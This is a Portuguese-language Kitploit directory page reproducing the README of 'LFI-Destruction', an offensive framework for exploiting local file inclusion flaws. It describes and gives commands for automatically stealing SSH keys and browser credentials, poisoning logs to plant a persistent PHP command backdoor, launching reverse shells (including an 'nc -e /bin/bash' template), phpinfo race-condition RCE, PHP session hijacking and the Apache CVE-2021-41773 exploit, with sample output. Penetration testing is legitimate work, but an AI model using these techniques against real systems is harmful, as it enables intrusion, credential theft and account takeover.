Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
LFI-Destruction — Este programa solicita as informações de Inclusão de Arquivo Local (Local File Inclusion) e automaticamente pesquisa o /etc/passwd e, usando os nomes de usuários encontrados, procura e baixa qualquer chave SSH ou variação de chaves para o computador local. Este programa também executa o exploit de travessia de caminho CVE-2021-41773 do Apache 2.4.49 e 50. Além de outras vulnerabilidades de LFI. | Kitploit
Ferramentas/GitHubGitHub/revshellxd/lfi-destruction
Escalada de PrivilégiosReconhecimentoAtaques de SenhaGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesCTF

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Testes de Penetração
Aprendizado e Educação
GitHubrevshellxd/lfi-destruction

LFI-Destruction

Ver Repositório
4há 6 mesesAinda não revisado

Sobre

Este programa solicita as informações de Inclusão de Arquivo Local (Local File Inclusion) e automaticamente pesquisa o /etc/passwd e, usando os nomes de usuários encontrados, procura e baixa qualquer chave SSH ou variação de chaves para o computador local. Este programa também executa o exploit de travessia de caminho CVE-2021-41773 do Apache 2.4.49 e 50. Além de outras vulnerabilidades de LFI.

Compartilhar

🔥 LFI-Destruction – Estrutura de Teste de Penetração Autorizada

LFI-Destroyer é um framework de exploração de Inclusão de Arquivo Local (LFI) abrangente e modular, projetado para profissionais de segurança autorizados. Ele combina múltiplas técnicas de ataque em uma ferramenta única e fácil de usar:

  • Fuzzing de Artefatos SSH e Navegador – Busca por chaves SSH, Putty PPK, WinSCP, FileZilla, Firefox, Chrome, Edge e credenciais Brave no Linux e Windows.
  • Envenenamento de Log → Reverse Shell – RCE automático através de arquivos de log graváveis com suporte a payload personalizado.
  • phpinfo() Race Condition RCE – LFI2RCE totalmente automatizado quando file_uploads=On e phpinfo() está acessível.
  • Trigger de Arquivo Carregado – Incluir e executar um shell PHP já carregado via LFI.
  • Enumeração de Sessão PHP – Baixar e decodificar arquivos de sessão para sequestro.

LFI-OSCP.py É a versão segura do exame OSCP que tem 0 auto exploits. É basicamente um fuzzer muito bonito que, uma vez que confirma a exploração, imprime instruções manuais sobre como realizar a exploração.

⚠️ AVISO LEGAL Esta ferramenta é apenas para fins educacionais e testes de segurança autorizados. Você deve ter permissão explícita por escrito do proprietário do sistema antes de usá-la. O acesso não autorizado a sistemas de computador é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta.

📦 Instalação

root@kitploit:~
# 1. Clone o repositório
git clone https://github.com/RevShellXD/LFI-Destroyer.git
cd LFI-Destroyer

# 2. Instale as dependências (apenas colorama é obrigatório; outros são opcionais)
pip install colorama

# 3. Torne o script principal executável
chmod +x LFI-Destroyer.py

🚀 Início Rápido – Modo 1 (Fuzzing de Artefatos SSH / Navegador)

root@kitploit:~
python3 LFI-Destroyer.py

Selecione Linux ou Windows.

📂 Estrutura de Diretórios

LFI-Destruction/ LFI-Destruction.py

modes/init.py ,mode3_phpinfo_race.py, mode4_upload_trigger.py, mode5_session_grabber.py

artifacts/

README.md

Escolha o modo de ataque 1.

Siga as instruções para configurar seu endpoint LFI.

O script irá enumerar automaticamente os usuários, verificar a existência (Windows usa o beacon NTUSER.DAT) e fazer fuzzing recursivo em busca de chaves SSH, credenciais de navegador e outros arquivos sensíveis.

Todos os artefatos são salvos no diretório ./artifacts/.

📝 Modo 2 – Envenenamento de Log e Reverse Shell

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua

Ou execute interativamente e selecione o modo 2.

O que acontece:

  • Injeta um payload de teste PHP via User-Agent (ou seu vetor escolhido).
  • Tenta incluir arquivos de log comuns (Apache, Nginx, SSH, logs do sistema, XAMPP/WAMP/IIS no Windows).
  • Se um log gravável for encontrado, injeta um backdoor persistente system($_GET['cmd']).
  • Confirma RCE com id (Linux) ou whoami (Windows).
  • Solicita um listener de reverse shell e entrega um reverse shell bash (Linux) ou PowerShell (Windows).

Reverse shell personalizado:

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua --custom-shell "nc {lhost} {lport} -e /bin/bash"

Os placeholders {lhost} e {lport} serão substituídos pelo IP/porta do seu listener.

🧪 BETA – Modo 3: phpinfo() Race Condition RCE Status: Beta – Funciona de forma confiável em servidores PHP mal configurados com file_uploads=On e phpinfo() acessível.

Pré-requisitos:

  • file_uploads = On (detectado automaticamente)
  • post_max_size ≥ upload_max_filesize (detectado automaticamente)
  • Vulnerabilidade LFI
  • Acesso a uma página phpinfo() (o script faz brute-force em locais comuns)

Executar:

root@kitploit:~
python3 LFI-Destroyer.py
# Selecione o modo 3

Forneça os detalhes do LFI como de costume.

O script irá:

  • Fazer brute-force no phpinfo() (wordlist específica do SO)
  • Analisar upload_max_filesize e post_max_size
  • Executar o ataque de race condition (upload + LFI)
  • Confirmar RCE
  • Oferecer reverse shell

Exemplo de saída:

root@kitploit:~
[*] Bruteforcing phpinfo.php (45 paths) ...
[+] Found phpinfo.php at http://192.168.1.100/phpinfo.php
[+] file_uploads=On (max size: 8M)
[+] Attempt race condition RCE? (y/N): y
[*] Race attempt 1/3 ...
[+] Extracted temporary file path: /tmp/phpABC123
[+] RCE confirmed via temporary file!
[!] LOG POISONING SUCCESSFUL! Ready to escalate to reverse shell.

🧪 BETA – Modo 4: Trigger de Arquivo Carregado Status: Beta – Assume que você já carregou um shell PHP (por exemplo, através de outra vulnerabilidade ou upload manual). O script então usa LFI para incluí-lo e executar comandos.

Dois modos de operação:

  • Caminho exato – Você sabe onde o arquivo está (ex.: uploads/shell.php).
  • Brute-force – Deixe o script tentar diretórios de upload comuns + nomes de arquivo.

Executar:

root@kitploit:~
python3 LFI-Destroyer.py
# Selecione o modo 4

Digite o caminho ou 'brute'.

O script irá:

  • Tentar inclusão LFI com ?cmd=whoami
  • Se bem-sucedido, mostrar a saída e oferecer reverse shell

Exemplo:

root@kitploit:~
Enter path to uploaded file (relative to web root), or 'brute' to try common locations: uploads/shell.php
[*] Trying uploads/shell.php ...
[+] SUCCESS! Shell executed at uploads/shell.php
[+] Command output:
www-data
Attempt reverse shell? (y/N): y

🧪 BETA – Modo 5: Enumeração e Sequestro de Sessão PHP Status: Beta – Lê arquivos de sessão de session.save_path (determinado via phpinfo() ou wordlist de fallback), salva-os e tenta decodificação base64 quando necessário.

Executar:

root@kitploit:~
python3 LFI-Destroyer.py
# Selecione o modo 5

Forneça o ID da sessão ou 'list' para enumerar.

Exemplos:

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: abc123
[*] Reading /var/lib/php/sessions/sess_abc123 ...
[+] Session file retrieved!
[--- SESSION DATA (raw) ---]
username|s:5:"admin";user_id|i:1;

Listagem do diretório de sessões (se a indexação de diretórios estiver habilitada):

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: list
[+] Found 12 session files:
  - sess_abc123
  - sess_def456
  ...

Todos os arquivos de sessão são salvos em artifacts/session_*. Se os dados parecerem codificados em base64, o script tenta automaticamente o bypass php://filter/convert.base64-decode e salva uma versão decodificada.

🧠 Modo Avançado (-adv) Habilita técnicas adicionais de LFI:

  • LFI por parâmetro POST
  • LFI por Cookie/Cabeçalho
  • Wrappers PHP (php://filter, data://, expect://)
  • Wordlist personalizada para fuzzing de artefatos
  • Detecção automática de profundidade
root@kitploit:~
python3 LFI-Destroyer.py -adv

⚙️ Flags de Linha de Comando Flag Descrição --os {linux,windows} Forçar SO alvo --auto-depth Detecção automática de profundidade de travessia --wordlist FILE Wordlist personalizada de caminho de arquivo (substitui padrões do SO) --userlist FILE Nomes de usuário Windows personalizados (modo 1) --beacon-file PATH Arquivo beacon personalizado (padrão: NTUSER.DAT) --custom-shell CMD Comando reverse shell personalizado (use {lhost} e {lport}) --log-poisoning Habilitar modo 2 a partir da CLI (sem seleção interativa de modo) --log-vector {ua,referer,xff,header,param} Vetor de injeção para envenenamento de log --log-header NAME Nome de cabeçalho personalizado (para vector=header) --log-param NAME Nome de parâmetro personalizado (para vector=param) --log-files FILE Lista de caminhos de log personalizados --rce-command CMD Comando de teste para verificação de RCE --proxy URL Proxy HTTP (ex.: http://127.0.0.1:8080) --rate FLOAT Atraso entre requisições (segundos) --output FILE Salvar resultados em JSON --dry-run Testar configuração – nenhuma requisição enviada --no-color Desabilitar saída colorida

Os modos 3, 4 e 5 são carregados dinamicamente do diretório modes/. Você pode facilmente adicionar novos modos colocando um arquivo Python com uma função run(config, fuzzer).

🧰 Requisitos

  • Python 3.8+
  • colorama (opcional, para saída colorida)
  • Nenhuma outra dependência – o script usa apenas a biblioteca padrão.

📜 Licença e Autor Escrito por RevShellXD Licenciado sob a Licença MIT – gratuito para profissionais de segurança autorizados.

Apenas para fins educacionais e testes autorizados. Se você infringir a lei com esta ferramenta, você é o único responsável.

⭐ Estrela e Contribua Se você achar esta ferramenta útil, por favor, dê uma estrela no repositório no GitHub. Pull requests e contribuições de novos modos são bem-vindos – siga a interface simples do módulo em modes/__init__.py.

Baixar ferramenta